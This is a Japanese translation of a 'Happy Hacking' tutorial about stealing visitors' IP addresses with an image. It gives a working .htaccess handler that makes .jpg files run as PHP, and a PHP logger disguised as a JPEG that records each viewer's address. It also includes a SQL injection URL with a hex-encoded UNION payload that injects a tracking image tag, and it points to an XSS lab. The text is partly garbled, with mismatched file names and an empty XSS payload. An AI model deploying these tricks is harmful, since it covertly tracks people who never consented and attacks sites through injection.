写真からIPアドレスを取得する

朝起きてから、「SQL インジェクション ステートメントを使用して IP アドレスを取得する」という記事を見つけたので、この記事を読んだ後、じっくり読んでみました。そこで、私は新しいアイデアを思いつきました。htaccess を使用して、写真付きで他の人の IP アドレスを取得する

このチュートリアルでは、写真を使用して IP アドレスを盗む方法を学びます。私のアイデアは、.htaccess ファイルを変更して、jpg ファイルを php ファイルとして解析することです。

次のコードを .htaccess に追加する必要があります:

AddHandler application/x-httpd-php5 .jpg

次に、次のコードを notepad にコピーします。 graber.jpg

$fh = fopen('ip_list.txt', 'a');

fwrite($fh, $ _SERVER[' REMOTE_ADDR']."

");

fclose($fh);

$im = imagecreatefromjpeg("n00b.png");

header('Content-Type: image/jpeg');

imagejpeg($im);

imagedestroy($im);

?>

grabber.jpg の権限を 755 に設定し、別の写真を見つけて n00b.png という名前を付け、graber.jpg と同じディレクトリに置きます。

これで準備は完了です。誰かが photograbber.jpg を閲覧すると、その IP アドレスが記録されます。

(翻訳者注: これらは私たちの個人的な Web サイト スペースにアップロードする必要があります)

POC:

(翻訳者注: 著者は、次のデモ写真を入手しました皆様のプライバシーを守るため、私はそれらを投稿しませんでした。読者は作者のブログにアクセスして閲覧することができます。)

この時点で、私たちの写真は使える状態になっています。

それでは、SQLi を使用して IP アドレスを取得する方法についても説明したいと思います。実際、写真を使用して IP アドレスを盗むのは非常に高速です。SQLi を使用する理由はありませんが、読者がより多くの知識を得られるように、

http://leettime. net/sqlninja.com/tasks/basic_ch1.php?id=1' ユニオン選択 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c616 22f696d61676569702f7472796d652e6a7067223e,3#

それでは、xss を使用して IP アドレスを取得する方法について説明しましょう:

http://leettime.net/xsslab1/chalg1.php?name=&submit=検索

はい、以上です。

実際、ほとんどのコミュニティでは写真の投稿が許可されているため、この方法を使用して写真にアクセスするすべてのユーザーの IP アドレスを取得できます。

Happy Hacking をお読みいただきありがとうございます。

出典: Hackers and Geeks (WeChat ID: freebuf)

リンク: http://www.freebuf.com/articles/database/101233 。 html

原文: http://securityidiots.com/Web-Pentest/Tricks/Grab-IP-Address-Using-Image.html

ウォッチャーコンパイル